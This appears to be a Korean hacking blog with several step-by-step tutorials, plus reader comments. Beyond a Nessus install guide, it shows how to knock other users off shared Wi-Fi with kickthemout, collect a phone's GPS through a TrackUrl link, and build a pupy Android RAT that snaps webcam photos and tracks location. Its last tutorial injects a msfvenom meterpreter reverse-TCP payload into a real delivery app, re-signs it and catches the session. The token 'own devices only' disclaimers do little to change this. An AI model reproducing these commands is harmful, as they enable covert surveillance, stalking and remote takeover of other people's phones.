728x90
반응형
728x90
반응형
728x90
반응형

1. nessus 다운로드


https://www.tenable.com/downloads/nessus


위 링크를 통해 다운로드 받으실 수 있습니다. 





자신의 운영체제에 맞는 설치파일을 다운받으시면 됩니다.


저는 kali linux 64bit에 설치할 것이기 때문에, 첫 번째에 있는 설치파일을 다운받았습니다.







2. activation code 얻기


아까 다운로드 페이지 상단에서 get activation code 를 클릭합니다.






오른쪽 nessus home의 register now 클릭





이름과 이메일을 입력해줍니다. 그러면 입력한 메일로 코드가 오게 됩니다.






3. nessus 설치


터미널에서 다운받은 경로에서 아래 명령어를 입력해줍니다.


chmod +x Nessus-8.2.1-debian6_amd64.deb

dpkg -i Nessus-8.2.1-debian6_amd64.deb 


(Nessus-8.2.1-debian6_amd64.deb 는 제가 받은 설치 파일명입니다.)




설치가 완료되면 터미널에 나온 메세지에 따라서


/etc/init.d/nessusd start


로 시작하고

그 아랫줄에 나온 url을 브라우저에 입력해서 접속해 줍니다.




Advanced > add Exepction...





(1/3) 계정 생성





(2/3) 코드 입력






(3/3) 이 부분은 시간이 상당히 오래 걸립니다. 기다리시면 됩니다.






에러가 날 경우, kali linux 기준으로, /opt/nessus/sbin에서 ./nessuscli update 명령어를 실행하면 다시 다운로드를 받을 수 있습니다. 필요 용량은 약 30GB라고 합니다.




설치가 완료되면, 페이지에서 로그인 하시면 됩니다,








4. 사용 방법



New Scan 클릭




저는 basic network scan을 해보겠습니다.





이름, 설명, ip를 입력해주고 save





launch 버튼을 클릭해 스캔을 시작합니다.










스캔이 완료된 후에 들어가보면, 찾은 취약점 정보를 확인할 수 있습니다.


728x90
반응형
728x90
반응형

해킹은 반드시 자신의 기기에만 해주세요.

그렇지 않을 경우 법적인 처벌을 받으실 수 있습니다.


kickthemout으로 같은 와이파이에 있는 이용자의 인터넷을 막아보기


해킹에 사용된 기기는 안드로이드 버전은 7.1.2의 샤오미 홍미 플러스입니다.

프로젝트에 사용된 PC의 운영체제는 kali linux 2018.1 입니다.


- 안드로이드 스마트폰 (그 외 와이파이 지원 기기들)

- kali linux





공격 기기와 공격 대상 기기 모두 같은 네트워크에 연결되어 있어야 합니다.


먼저, 인터넷이 잘되는지 확인해주셔야 합니다.





1. kickthemout을 설치합니다.


github : https://github.com/k4m4/kickthemout



readme에 운영체제 각각의 설치방법이 있습니다.


저는 kali linux를 사용하므로 데비안 설치방법을 따라하겠습니다.


~ ❯❯❯ sudo apt-get update && sudo apt-get install nmap

~ ❯❯❯ git clone https://github.com/k4m4/kickthemout.git

~ ❯❯❯ cd kickthemout/

~/kickthemout ❯❯❯ sudo -H pip3 install -r requirements.txt


~/kickthemout ❯❯❯ sudo python3 kickthemout.py

실행 전에, scapy도 설치해주셔야 합니다. sudo pip3 install scapy







2. 실행.....아니 오류 해결


저는 실행을 하자 이런 오류가 났습니다. 그래서 해결방법을 찾아보았고, 찾을 수 있었습니다.


https://github.com/k4m4/kickthemout/pull/294






코드를 수정하라고 하네요.





gedit으로 해당 코드를 수정하고 실행을 해주었습니다.







3. 진짜 실행


자동으로 스캔을 하고



메인메뉴로 진입하게 됩니다. 현재 2개의 호스트가 존재한다고 하네요.




저는 타겟 한개만을 대상으로 공격을 할 것이므로, 1을 입력했습니다.



공격 대상이 1번에 있으니 1을 입력해주겠습니다.



그럼 자동으로 스푸핑이 진행됩니다. 이때 해당 기기로 인터넷에 접속한다면?





인터넷이 안되는 것을 확인할 수 있습니다. 그럼 사용자는 인내심이 한계에 도달에 다른 네트워크에 접속하려고 할 것입니다.


그래서 이름이 kickthemout....

728x90
반응형
728x90
반응형

해킹은 반드시 자신의 기기에만 해주세요.

그렇지 않을 경우 법적인 처벌을 받으실 수 있습니다.


Trackurl로 스마트폰 위치추적하기


해킹에 사용된 기기는 안드로이드 버전은 7.1.2의 샤오미 홍미 플러스입니다.

프로젝트에 사용된 PC의 운영체제는 kali linux 2018.1 입니다.


- 안드로이드 스마트폰 (gps되는 스마트폰이면 다 됩니다.)

- kali linux




1. trackurl을 다운로드 받습니다.


https://github.com/zanyarjamal/TrackUrl




git clone https://github.com/zanyarjamal/TrackUrl







2. Trackurl 폴더로 이동하여 Trackurl.sh파일의 내용을 약간 변경햐줍니다.


gedit Trackurl.sh





xterm -e ./ngrok http 80 & clear 를


gnome-terminal -e "./ngrok http 80" 으로 변경해 주었습니다.


이 외에도 이미지 경로를 수정하여 자신이 원하는 이미지로 변경해줄 수 있습니다.





3. Trackurl.sh를 실행합니다.


./Trackurl.sh


새로운 터미널 창이 하나 뜨게 되고 url이 표시됩니다.

https://로 시작하는 url을 원래 터미널 창에 입력해줍니다.






4. 스마트폰으로 해당 url에 접속합니다.

그러면 터미널에 로그가 남습니다.




빨간색으로 표시된 부분(일부 가렸습니다.)이 gps값입니다. 해당 값을 구글지도에 검색하면 해당 위치가 표시됨을 알 수 있습니다.




728x90
반응형
728x90
반응형

해킹은 반드시 자신의 기기에만 해주세요.

그렇지 않을 경우 법적인 처벌을 받으실 수 있습니다.


pupy로 안드로이드 해킹하기


해킹에 사용된 기기는 안드로이드 버전은 7.1.2의 샤오미 홍미 플러스입니다.

프로젝트에 사용된 PC의 운영체제는 kali linux 2018.1 입니다.


- 안드로이드 스마트폰

- kali linux


 


1. pupy를 다운로드 받고 설치합니다.

https://github.com/n1nj4sec/pupy



다음 명령어를 순서대로 입력했습니다.


git clone https://github.com/n1nj4sec/pupy.git pupy


cd pupy


git submodule init


git submodule update


pip install -r pupy/requirements.txt


wget https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz


tar xvf payload_templates.txz && mv payload_templates/* pupy/payload_templates/ && rm payload_templates.txz && rm -r payload_templates 







정상적으로 설치됨을 확인합니다.




2. pupysh를 실행해봅니다.


python pupysh.py





패스워드를 입력하는 부분에서는 칼리리눅스 계정 패스워드를 입력하면 됩니다.


정상적으로 서버가 동작함을 확인하고 exit명령어로 서버를 종료했습니다.

 


3. 이제 악성코드를 만들어봅시다.

 

악성코드는 pupygen.py로 만들 수 있습니다.


python pupygen.py -O android -o mandu.apk connect --host 192.168.0.7 --transport ssl


(저는 mandu.apk라는 이름으로 생성하였습니다.)


옵션 설명

-O 해킹할 운영체제

-o 출력할 파일명


connect

--host 칼리리눅스(공격자의 컴퓨터)의 아이피 (ifconfig 명령어로 자신의 아이피를 확인할 수 있습니다.)

--transport ssl (pupy.conf.default에 작성된 내용 그대로 입력하면 됩니다. ssl으로 기본설정 되어있습니다.)




4. 만들어진 악성코드 파일을 안드로이드 기기가 다운받을 수 있도록 아파치 서버에 업로드 하였습니다.



파일에 권한을 부여하고, 아파치 서버를 가동하였습니다.


mv mandu.apk /var/www/html/ #파일 이동


chmod 777 /var/www/html/mandu.apk #권한 부여


service apache2 start #아파치 서버 시작

 



5. 안드로이드 기기에서 해당 파일을 다운로드 받습니다.


http://192.168.0.7/mandu.apk

 

그리고 설치합니다.




6. 칼리리눅스 (공격자의 컴퓨터)에서 서버를 실행합니다.


python pupysh.py

 

서버가 대기상태가 됩니다.



7. 안드로이드 기기에서 해당 어플을 실행합니다.

안드로이드 기기에서는 와이파이 설정 화면으로 이동하게 됩니다.

10초후 공격자 컴퓨터의 pupysh.py에서는 하나의 세션이 잡히게 됩니다.




8. list_modules 라는 명령어를 통해 pupy에서 사용할 수 있는 모듈을 목록을 확인할 수 있습니다.

 

run gather/webcamsnap 명령어를 통해 카메라로 사진을 찍어 볼 수 있습니다

 

run gather/gpstracker --start 명령어를 통해 해당 기기의 gps값을 트래킹하고,(15초 마다 gps값을 가져옵니다.)

run gather/gpstracker --dump 명령어를 통해 가져온 gps값을 확인할 수 있습니다. (파일이 저장됩니다.)

얻은 gps값을 구글지도에 검색하면 실제 기기의 위치정보를 확인할 수 있습니다. 매우 정확합니다.

 

이 외에도 pupy는 다양하고 많은 모듈을 지원하므로 다른 정보들도 가져오는 것이 가능함을 알 수 있습니다.

728x90
반응형
  1. toor 2018.06.12 19:18

    안녕하세요..중간에 있는 IP값은 ifconfig 에서 나온 ip를 넣는 것인가요..?

  2. 궁금 2018.06.19 14:52

    테스트중이긴한데.. 안드로이드 갤럭시 S5 에서도 되나여?
    이게 최신기종이 안된다고 해서 ...남는폰으로 하는거라....
    그리고 노트북이랑 핸드폰을 Wi-fi 동일하게 잡고, apk 악성코드를 생성 후, 파일을 넣어서 설치하니까 hello from pupy 뜨긴하는데
    (리눅스 pupy shell) 핸들러부분에서 안되네여.. 이게 기종이 문제인지..아니면 제가 뭔가를 잘못한거지 ㅠㅠ

  3. root 2018.11.11 22:39

    안녕하세요 며칠동안 고민하다가 댓글 남겨요ㅠㅠ pupysh를 실행하면 importerror no module named elftools.elf.elffile 이런 오류가 뜨는데 뭐가 문제일까요?ㅠㅠ

    • M4ndU 2018.11.12 18:48 신고

      모듈이 제대로 설치가 안된 것 같습니다.
      sudo -H pip install -r requirements.txt
      이거 해보세요.

  4. 애상 2018.11.18 17:41

    안녕하세요 남는 안드로이드 폰으로
    CCTV겸 사용하려 합니다
    피시렛 처럼 카메라 실행하지 않아도
    실시간 영상볼수 있는 프로그램이 잇을런지요?
    피시렛 파일은 너무 구하기가 힘드네요..

  5. 드림캐처 2019.01.06 19:04

    안녕하세요 pupy 설치후 파일이동 . 권한부여, 아파치서비스까지 올리고
    해당공격자 아이피 URL접속하여 다운이 되야되는데
    접속자체가 안되며 네트워크 연결이 안된다고 뜨네요?
    방법이 있을까요 테스트 기종은 LG V20입니다

    • M4ndU 2019.01.06 23:38 신고

      그 부분은 본인이 사용하고 계시는 네트워크 환경에 따라서 다르게 하셔야 합니다.

      내부 네트워크 환경이라면, 공격자 내부 아이피로 접속하시면 됩니다.

      위 글에서 192.168.0.7은 제 네트워크 환경에서의 내부 아이피이기 때문에, 그대로 사용하시면 안됩니다.

  6. 최종변기 2019.02.24 15:17

    pip 인스톨로 모듈을 설치해도 이런 오류가 뜨네요 ㅠㅠㅠ


    [-] Invalid module: search at (/root/pupy/pupy/modules/search.py): No module named dateparser. Traceback:
    File "/root/pupy/pupy/pupylib/PupyServer.py", line 810, in _refresh_modules
    module_object = imp.load_source(modname, modpath)
    File "/root/pupy/pupy/modules/search.py", line 10, in <module>
    import dateparser
    [-] Invalid module: igd at (/root/pupy/pupy/modules/igd.py): No module named defusedxml. Traceback:
    File "/root/pupy/pupy/pupylib/PupyServer.py", line 810, in _refresh_modules
    module_object = imp.load_source(modname, modpath)
    File "/root/pupy/pupy/modules/igd.py", line 7, in <module>
    from defusedxml import minidom
    [-] Invalid module: search at (/root/pupy/pupy/modules/search.py): No module named dateparser. Traceback:
    File "/root/pupy/pupy/pupylib/PupyServer.py", line 810, in _refresh_modules
    module_object = imp.load_source(modname, modpath)
    File "/root/pupy/pupy/modules/search.py", line 10, in <module>
    import dateparser
    [-] Invalid module: igd at (/root/pupy/pupy/modules/igd.py): No module named defusedxml. Traceback:
    File "/root/pupy/pupy/pupylib/PupyServer.py", line 810, in _refresh_modules
    module_object = imp.load_source(modname, modpath)
    File "/root/pupy/pupy/modules/igd.py", line 7, in <module>
    from defusedxml import minidom

    pip install을 하게되면 아래와 같은 오류가 뜨네요....



    Can't rollback M2Crypto, nothing uninstalled.
    Command "/usr/bin/python -u -c "import setuptools, tokenize;__file__='/tmp/pip-build-ZEfyQO/M2Crypto/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-1grVxc-record/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /tmp/pip-build-ZEfyQO/M2Crypto/



    정말 일주일동안해봐도 github에있는 방법으로는 해결할수가없네요 혹시 아시다면 리플라이 부탁드려요 ㅠㅠ

    • M4ndU 2019.02.24 21:39 신고

      저도 잘 모르겠네요..ㅠㅠ
      한 번 다른 가상머신이나 운영체제에서 시도해 보세요.

  7. woon 2019.07.28 16:38

    바이러스가 있다고 다운로드가 안되는데요.

  8. 2019.08.26 23:21

    비밀댓글입니다

    • 2019.08.26 23:44

      비밀댓글입니다

    • 2019.08.27 05:12

      비밀댓글입니다

    • 2019.08.27 23:52

      비밀댓글입니다

    • 2019.08.29 01:06

      비밀댓글입니다

    • 2019.08.29 10:12

      비밀댓글입니다

  9. 2019.08.29 17:59

    비밀댓글입니다

    • M4ndU 2019.08.29 20:33 신고

      해당 앱이 어떤 기능을 하느냐에 따라 필요 권한은 달라집니다. 완전히 자기 것처럼 이용하려면 모든 종류의 권한을 받아야 할 것 같습니다.

  10. 2019.08.29 20:38

    비밀댓글입니다

  11. 2019.08.29 21:32

    비밀댓글입니다

    • M4ndU 2019.08.29 21:40 신고

      제가 직접 해보거나, 관련 자료를 찾아본 적이 없어서,, 부정확할 수 있습니다만,
      일단 데이터를 날려버리는 것 정도는 가능해보입니다.



      확실한건 악성앱을 어떻게 만들어내냐에 따라 불가능한 것은 없습니다.

  12. 2019.08.29 21:44

    비밀댓글입니다

  13. 문의 2019.09.11 05:01

    혹시 악성앱이 카메라권한으로 사진을 찍을경우 찰칵 소리가 난다거나 그 사진이 제 사진첩에 저장이 되나요?? 소리나 저장없이 해커한테만 전송될수 잇나요?ㅔ

  14. help 2019.12.14 18:08

    pip가 없는 명령어라네요

  15. 2020.03.19 22:51

    비밀댓글입니다

    • M4ndU 2020.03.20 01:00 신고

      git clone 명령어 이후에 pupy 폴더가 생성되지 않았나요?

  16. ㅇㅇ 2020.04.22 10:10

    포트포워딩 필요해요??

    • M4ndU 2020.04.22 12:54 신고

      본인 네트워크 환경에 따라 포트포워딩이 필요할 수 있습니다.

728x90
반응형

해킹은 반드시 자신의 기기에만 해주세요.

그렇지 않을 경우 법적인 처벌을 받으실 수 있습니다.


안드로이드 어플리케이션 후킹하기

커버로스님의 영상 : https://www.youtube.com/watch?v=4YCwXZ1SVls&t=717s


해킹에 사용된 기기는 안드로이드 버전은 7.1.2의 샤오미 홍미 5 플러스입니다.

후킹할 어플리케이션으로 배달의 민족을 사용했습니다.

프로젝트에 사용된 PC의 운영체제는 kali linux 2018.1 입니다.


- 안드로이드 스마트폰

- 후킹할 어플

- kali linux



* 칼리 리눅스에 설치되어 있는 apktool 2.3.1는 어플을 빌드하는 과정중에 오류가 발생하므로,

https://bitbucket.org/iBotPeaches/apktool/downloads/ 에서 최신버전을 다운로드 받아 사용하였습니다. (2.3.3)



1.어플리케이션 다운로드 받기



https://apkpure.com/ 에서 후킹할 apk파일을 다운로드 받습니다. 저는 '배달의 민족' 어플리케이션을 사용하였습니다.


그 뒤 파일명을 baedal.apk로 바꾸었습니다.



2. msfvenom을 이용하여 악성코드 apk파일을 생성합니다.

저는 payload.apk로 만들었습니다.

lhostPCip주소를, lport로는 4444로 지정해주었습니다.


# msfvenom p android/meterpreter/reverse_tcp lhost=192.168.0.7 lport=4444 o payload.apk




3. payload.apk baedal.apk 모두 apktool를 이용하여 디패키징합니다.




4. payload/smali/com/에 있는 metasploit/baedal/smali/com/으로 복사합니다.




5. baedal/payload/에 있는 각각의 AndroidManifest.xml파일을 gedit을 통해 엽니다.


# gedit AndroidManifest.xml




6. payload의 권한과 기능을 baedal로 복사합니다.


payloadAndroidManifest.xml에 있는 모든 permissionfeature부분을 복사하여

baedalAndroidManifest.xml로 붙여넣기합니다.



^ payloadAndroidManifest.xml에 있는 모든 permissionfeature부분




^ baedalAndroidManifest.xml로 붙여넣기한 모습



7. 어플리케이션이 처음 실행될 때 시작되는 Activity 부분을 찾습니다.

launchermain은 항상 붙어다니기 때문에 launcher을 검색하여 main부분을 찾습니다.




^ category인 LAUNCHER 바로 위에 action인 MAIN이 보입니다.



main이 포함되어있는 activity가 앱이 처음 실행될 때 시작되는 activity입니다.

activity파일의 경로를 확인합니다.



com.baemin.presentation.ui.GateWayActivity



8. 위 경로를 따라 GateWayActivity파일을 찾아 엽니다.




onCreate 함수를 찾습니다.

어플리케이션이 처음 실행될 때 무엇인가가 생성되는 부분임을 알 수 있습니다.




metasploit/stage/ 에 있는 MainService.smali파일을 cat명령어로 출력한 뒤

출력된 문자열중 최하단에서 4번째줄의 명령어를 복사하여

invoke-super {p0, p1}, Landroid/support/v7/app/c;->onCreate...(생략) 부분 바로 아래에 붙여넣습니다.




이 것을 후킹이라고 합니다.



9. 이제 apktool을 사용하여 baedal/을 빌드(패키징)해줍니다. -o 옵션으로 baemin.apk라는 이름을 주었습니다.



빌드중 에러가 발생했습니다. 이정도 에러는 보고 수정해준뒤 다시 빌드하면 됩니다.

에러를 보니 keyboardNavigationCluster 를 찾을 수 없는 것 같은데, 그냥 지우고 다시 빌드합니다.




빌드에 성공했습니다.



빌드에 성공하여 baemin.apk파일을 확인할 수 있습니다.




10. baemin.apk에 서명을 합니다.

서명되지 않은 안드로이드 어플리케이션은 안드로이드 기기에 설치할 수 없으므로 서명을 꼭 해야합니다.


keytooljarsigner을 사용하여 baemin.apk 서명작업을 진행하였습니다.

그 전에 keytool이 정상적으로 동작할 수 있도록 home/.android파일을 생성해줍니다.


# cd ~

# mkdir .android

 

# keytool genkey v keystore ~/.android/debug.keystore storepass android alias androiddebugkey keypass android validity 9999

(옵션 validity 99999999일 동안 유효함을 의미합니다.)


# jarsigner verbose keystore ~/.android/debug.keystore storepass android keypass android sigalg SHA256withDSA baemin.apk androiddebugkey




11. 해킹될 기기에서 해당 어플리케이션을 다운로드 받습니다.


아파치 서버를 열고, 서버 경로에 baemin.apk를 옮겨둡니다.




안드로이드 기기에서 http://192.168.0.7/baemin.apk로 이동하여 파일을 다운로드 받습니다.



12. msfconsole 사용을 위해 handler.rc파일을 생성합니다.


# vi handler.rc




postgresql를 시작하고, msfconsole도 시작합니다.


# service postgresql start

# msfconsole r handler.rc



13. 안드로이드 기기에서 baedal.apk파일을 설치하고 실행합니다.




실행시, 정상적인 배달의 민족 어플리케이션으로 보이게 됩니다.

그러나 PC에서는 세션이 하나 잡히게 됩니다.



 

세션을 확인하고 연결합니다.



이제 해킹에 성공한 것입니다.

해당 기기의 정보를 확인할 수도 있으며(sysinfo), 스크린샷을 찍어 볼 수도 있습니다(screenshot).




728x90
반응형
  1. HackingPractice 2019.06.29 23:48 신고

    휴대폰에서 키면 왜 세션이 연결이 안될까요?

    • M4ndU 2019.06.30 09:13 신고

      저는 2개의 기기를 시도해 보았는데요, 그 중 하나만 성공했었습니다. 한 번 다른 기기로 시도해보세요.

+ Recent posts